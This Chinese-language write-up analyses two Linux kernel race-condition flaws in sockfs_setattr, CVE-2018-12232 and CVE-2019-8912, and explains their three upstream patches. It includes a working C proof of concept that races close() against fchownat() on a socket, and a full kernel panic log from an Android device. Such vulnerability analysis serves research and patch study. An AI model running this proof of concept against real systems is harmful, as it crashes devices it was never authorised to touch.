CVE-2018-12232-And-CVE-2019-8912

CVE-2018-12232&&CVE-2019-8912

---

前言

漏洞信息

• 实验环境：Android-> MiX2
• 漏洞类型：条件竞争 -> 释放后重引用
• linux补丁：
  • CVE-2018-12232:https://git.kernel.org/pub/scm/linux/kernel/git/torvalds/linux.git/commit/?id=6d8c50dcb029872b298eea68cc6209c866fd3e14(第一次修补)
  • CVE-2019-8912:https://git.kernel.org/pub/scm/linux/kernel/git/torvalds/linux.git/commit/?id=9060cb719e61b685ec0102574e10337fa5f445ea(第二次修补)
  • CVE-2019-8912:https://git.kernel.org/pub/scm/linux/kernel/git/torvalds/linux.git/commit/?id=ff7b11aa481f682e0e9711abfeb7d03f5cd612bf(第三次修补)

漏洞原理

漏洞原理

这里简单记录一下今天看的两个漏洞(CVE-2018-12232和CVE-2019-8912),挺有意思的两个洞，CVE-2018-12232这个漏洞的原理就是由于竞争条件导致close释放了sk后没有把sk设置为null，在sockfs_setattr函数中直接把sock->sk拿来使用导致的释放后重引用问题。而第二个洞(CVE-2019-8912)则是由于在修补第一个洞(CVE-2018-12232)时考虑不周导致的修复不彻底可以绕过第一次的修复的二次修复。

漏洞造成的影响

通过条件竞争触发释放后重引用达到内核态NULL指针解引用实现拒绝服务攻击

补丁用意

Linux补丁是2018年6月份的时候对该漏洞打上的补丁，补丁主要是在sockfs_setattr函数中添加了对sock->sk是否为NULL的检查，因为通常release函数中释放完sk内存后都把sock->sk设置为NULL，所以我们在sockfs_setattr中判断一下是否为NULL就可避免别的线程通过release函数竞争释放掉sock->sk内存后触发的释放后重引用问题，可惜的是这次的修补并不能算是一个成功的修补。这就引出了第二次修补，其实第二次修补从时间来看也分为两次，第一次是2019年2月18日只是单独在crypto模块的af_alg_release函数中把sock->sk置为NULL避免了AF_ALG套接字的UAF，但是后来发现这样修补并没有从根本上解决问题，因为还有许多模块的release函数也存在没把sock->sk置为NULL的问题，所以2019年2月25日再次进行修补，这次修补是直接在调用完release函数之后把sock->sk置为NULL，这样才从根本上解决了sock->sk内存释放后没置为NULL引发的NULL指针解引用问题。

漏洞模型

释放内存后未对指针变量置为NULL，由于别的地方对该指针还有引用并且使用时还没有判断指针是否为NULL，从而触发了释放后重引用问题，很标准的释放后重引用模型。

漏洞复现

Proof of Concept

#include <pthread.h>
#include <stdlib.h>
#include <unistd.h>
#include <arpa/inet.h>
#include <sys/socket.h>

pthread_t t;
volatile int fd;

void *close_thread(void *arg){
    for (;;) {
        close(fd);
    }
}

void *setattr_thread(void *arg){
    for (;;) {
		if(fchownat(fd, "", 2000, 2000, 0x1000) == -1){
			//perror("> ");
		}
    }
}

int main(){
    pthread_create(&t, NULL, close_thread, NULL);
	pthread_create(&t, NULL, setattr_thread, NULL);
    for (;;) {
        fd = socket(AF_INET, SOCK_STREAM, IPPROTO_TCP);
        if(fd == -1){
			perror("> ");
		}
        close(fd);
    }
}

Crash Log

[25032.287867] FG: soc_work_fn: adjust_soc: 079: 00, 00, 00, 03
[25032.946282] Unable to handle kernel NULL pointer dereference at virtual address 0000025c
[25032.946349] pgd = ffffffc092f0f000
[25032.946364] [0000025c] *pgd=00000000f0737003, *pud=00000000f0737003, *pmd=0000000000000000
[25032.946601] ------------[ cut here ]------------
[25032.946618] Kernel BUG at ffffff8008cc2284 [verbose debug info unavailable]
[25032.946636] Internal error: Oops - BUG: 96000046 [#1] PREEMPT SMP
[25032.946653] Modules linked in: wlan(O) exfat(O)
[25032.946707] CPU: 2 PID: 9620 Comm: poc Tainted: G        W  O    4.4.78-perf-gdd4cbe9-00529-g1a92c1c #1
[25032.946722] Hardware name: Qualcomm Technologies, Inc. MSM 8998 v2.1 MTP (DT)
[25032.946743] task: ffffffc0a2ca3000 ti: ffffffc0a41fc000 task.ti: ffffffc0a41fc000
[25032.946789] PC is at sockfs_setattr+0x30/0x40
[25032.946809] LR is at sockfs_setattr+0x18/0x40
[25032.946826] pc : [<ffffff8008cc2284>] lr : [<ffffff8008cc226c>] pstate: 20000145
[25032.946839] sp : ffffffc0a41ffd40
[25032.946852] x29: ffffffc0a41ffd40 x28: ffffffc0a41fc000
[25032.946877] x27: 0000000000005800 x26: 000000000000c1ff
[25032.946901] x25: ffffffc0a41ffe18 x24: ffffffc174cf43a0
[25032.946924] x23: ffffffc0ac9c6840 x22: ffffffc0a41ffe20
[25032.946948] x21: ffffffc0a134d430 x20: ffffffc0ac9c6840
[25032.946972] x19: ffffffc0a41ffe20 x18: 0000000000000000
[25032.946995] x17: 0000000000000001 x16: ffffff80081b6598
[25032.947019] x15: 0000007fe17f3aa8 x14: 0000000000000001
[25032.947042] x13: 0000000000000001 x12: 0000000000000003
[25032.947066] x11: 0101010101010101 x10: fffffffffffffffd
[25032.947088] x9 : 0000000000000005 x8 : 0000000000000002
[25032.947111] x7 : 00000000003ceaa4 x6 : 0000004173d33000
[25032.947134] x5 : 0000000000000000 x4 : 0000000000000000
[25032.947159] x3 : 0000000000000000 x2 : 00000000000007d0
[25032.947182] x1 : 0000000000000000 x0 : 0000000000000000
[25032.947209]
[25032.947209] PC: 0xffffff8008cc2184:
[25032.947225] 2184  36580062 52800802 b90073a2 f9400402 92800380 b5000202 f9400822 d2800000
[25032.947294] 21a4  b40001a2 b94073a3 aa0103f3 aa0403e0 aa1403e1 97ffffcd 93407c00 a9410e82
[25032.947359] 21c4  a9000e62 f9401a81 a9420e82 a9010e62 f9001261 a94153f3 a8c87bfd d65f03c0
[25032.947424] 21e4  a9bb7bfd 910003fd a90153f3 a9025bf5 f9001bf7 aa0103f4 aa0003f7 91004020
[25032.947489] 2204  52800041 aa0403f6 d5384113 f90027a5 f9400675 97dac853 92800000 f9000660
[25032.947555] 2224  f94027a5 aa1703e0 aa1403e1 aa1603e2 2a0503e3 97ffffad f9000675 a94153f3
[25032.947619] 2244  a9425bf5 f9401bf7 a8c57bfd d65f03c0 a9be7bfd 910003fd a90153f3 aa0003f4
[25032.947682] 2264  aa0103f3 97d45e34 350000e0 b9400261 360800a1 f9401a81 b9400a62 f85f0021
[25032.947748] 2284  b9025c22 a94153f3 a8c27bfd d65f03c0 a9bd7bfd 910003fd a90153f3 a9025bf5
[25032.947814] 22a4  2a0203f6 aa0103f3 f9401002 aa0003f5 aa1303e3 79402040 79429441 39452442
[25032.947876] 22c4  97fffcfa 2a0003f4 37f80294 f94016a0 2a1603e2 f9400261 f9401803 aa1503e0
[25032.947942] 22e4  d63f0060 2a0003f4 36f800b4 f9400260 97fffc0d f900027f 14000008 f9400260
[25032.948009] 2304  f94016a1 f9001401 f9400260 f9401400 f9400400 97d16f06 2a1403e0 a94153f3
[25032.948074] 2324  a9425bf5 a8c37bfd d65f03c0 a9be7bfd 7100a01f 910003fd a90153f3 54000049
[25032.948140] 2344  d4210000 9000b7b3 2a0003f4 911b0273 91008273 aa1303e0 9407f3ad d0007a20
[25032.948203] 2364  937d7e81 91352000 91002000 f821681f aa1303e0 9407f433 97d1076f d0005b60
[25032.948272]
[25032.948272] LR: 0xffffff8008cc216c:
[25032.948287] 216c  a9047e9f a9021e86 f9001a85 f9003fa0 f9406844 b9404042 36580062 52800802
[25032.948354] 218c  b90073a2 f9400402 92800380 b5000202 f9400822 d2800000 b40001a2 b94073a3
[25032.948418] 21ac  aa0103f3 aa0403e0 aa1403e1 97ffffcd 93407c00 a9410e82 a9000e62 f9401a81
[25032.948481] 21cc  a9420e82 a9010e62 f9001261 a94153f3 a8c87bfd d65f03c0 a9bb7bfd 910003fd
[25032.948544] 21ec  a90153f3 a9025bf5 f9001bf7 aa0103f4 aa0003f7 91004020 52800041 aa0403f6
[25032.948609] 220c  d5384113 f90027a5 f9400675 97dac853 92800000 f9000660 f94027a5 aa1703e0
[25032.948676] 222c  aa1403e1 aa1603e2 2a0503e3 97ffffad f9000675 a94153f3 a9425bf5 f9401bf7
[25032.948741] 224c  a8c57bfd d65f03c0 a9be7bfd 910003fd a90153f3 aa0003f4 aa0103f3 97d45e34
[25032.948806] 226c  350000e0 b9400261 360800a1 f9401a81 b9400a62 f85f0021 b9025c22 a94153f3
[25032.948869] 228c  a8c27bfd d65f03c0 a9bd7bfd 910003fd a90153f3 a9025bf5 2a0203f6 aa0103f3
[25032.948934] 22ac  f9401002 aa0003f5 aa1303e3 79402040 79429441 39452442 97fffcfa 2a0003f4
[25032.949000] 22cc  37f80294 f94016a0 2a1603e2 f9400261 f9401803 aa1503e0 d63f0060 2a0003f4
[25032.949065] 22ec  36f800b4 f9400260 97fffc0d f900027f 14000008 f9400260 f94016a1 f9001401
[25032.949129] 230c  f9400260 f9401400 f9400400 97d16f06 2a1403e0 a94153f3 a9425bf5 a8c37bfd
[25032.949194] 232c  d65f03c0 a9be7bfd 7100a01f 910003fd a90153f3 54000049 d4210000 9000b7b3
[25032.949261] 234c  2a0003f4 911b0273 91008273 aa1303e0 9407f3ad d0007a20 937d7e81 91352000
[25032.949330]
[25032.949330] SP: 0xffffffc0a41ffc40:
[25032.949345] fc40  73d33000 00000041 003ceaa4 00000000 00000002 00000000 00000005 00000000
[25032.949408] fc60  fffffffd ffffffff 01010101 01010101 00000003 00000000 00000001 00000000
[25032.949472] fc80  00000001 00000000 e17f3aa8 0000007f 081b6598 ffffff80 00000001 00000000
[25032.949536] fca0  00000000 00000000 a41ffe20 ffffffc0 ac9c6840 ffffffc0 a134d430 ffffffc0
[25032.949600] fcc0  a41ffe20 ffffffc0 ac9c6840 ffffffc0 74cf43a0 ffffffc1 a41ffe18 ffffffc0
[25032.949664] fce0  0000c1ff 00000000 00005800 00000000 a41fc000 ffffffc0 a41ffd40 ffffffc0
[25032.949729] fd00  08cc226c ffffff80 a41ffd40 ffffffc0 08cc2284 ffffff80 20000145 00000000
[25032.949796] fd20  a41ffd40 ffffffc0 08cc226c ffffff80 00000000 00000080 ac9c6840 ffffffc0
[25032.949861] fd40  a41ffd60 ffffffc0 081cfbe4 ffffff80 00001846 00000000 00000000 00000000
[25032.949927] fd60  a41ffdb0 ffffffc0 081b54b4 ffffff80 00000000 00000000 a41ffeb0 ffffffc0
[25032.949990] fd80  a134d430 ffffffc0 000007d0 00000000 000007d0 00000000 a134d4d8 ffffffc0
[25032.950055] fda0  00000040 00000000 00000042 00000000 a41ffe70 ffffffc0 081b6628 ffffff80
[25032.950121] fdc0  00000000 00000000 00004001 00000000 00000000 00000000 0042a302 00000000
[25032.950185] fde0  000007d0 00000000 000007d0 00000000 0000011d 00000000 00000036 00000000
[25032.950251] fe00  09002000 ffffff80 00000000 00000000 00000000 00000000 00000000 00000000
[25032.950315] fe20  00001846 00000000 000007d0 000007d0 a41ffe50 ffffffc0 5a043e06 00000000
[25032.950380]
[25032.950396] Process poc (pid: 9620, stack limit = 0xffffffc0a41fc020)
[25032.950412] Call trace:
[25032.950435] Exception stack(0xffffffc0a41ffb70 to 0xffffffc0a41ffca0)
[25032.950454] fb60:                                   ffffffc0a41ffe20 0000008000000000
[25032.950476] fb80: ffffffc0a41ffd40 ffffff8008cc2284 ffffffbdc284d300 ffffffc0a134e080
[25032.950498] fba0: ffffffc174ce2300 ffffff8008cc1d38 ffffffc0a41fc000 ffffffc0a41fc000
[25032.950521] fbc0: 000000000000bf42 ffffff8009007000 ffffff8009002000 ffffffc0a41fc000
[25032.950542] fbe0: ffffffc0a41ffc00 0000000108146380 ffffffc0a134e080 ffffffc0a41fc000
[25032.950564] fc00: ffffffc0a41ffc60 ffffffc0a134e080 0000000000000000 0000000000000000
[25032.950583] fc20: 00000000000007d0 0000000000000000 0000000000000000 0000000000000000
[25032.950603] fc40: 0000004173d33000 00000000003ceaa4 0000000000000002 0000000000000005
[25032.950623] fc60: fffffffffffffffd 0101010101010101 0000000000000003 0000000000000001
[25032.950644] fc80: 0000000000000001 0000007fe17f3aa8 ffffff80081b6598 0000000000000001
[25032.950670] [<ffffff8008cc2284>] sockfs_setattr+0x30/0x40
[25032.950709] [<ffffff80081cfbe4>] notify_change2+0x22c/0x348
[25032.950737] [<ffffff80081b54b4>] chown_common+0xac/0x130
[25032.950759] [<ffffff80081b6628>] SyS_fchownat+0x90/0xd0
[25032.950788] [<ffffff8008082730>] el0_svc_naked+0x24/0x28
[25032.950812] Code: 360800a1 f9401a81 b9400a62 f85f0021 (b9025c22)
[25032.950833] ---[ end trace 891e55ff6a5e58d7 ]---
[25034.044441] Kernel panic - not syncing: Fatal exception
[25034.044474] CPU0: stopping

总结

多看看内核补丁，看能不能通过补丁找到类似的漏洞，很有可能捡到一些漏洞呢。
希望早点捡到漏洞。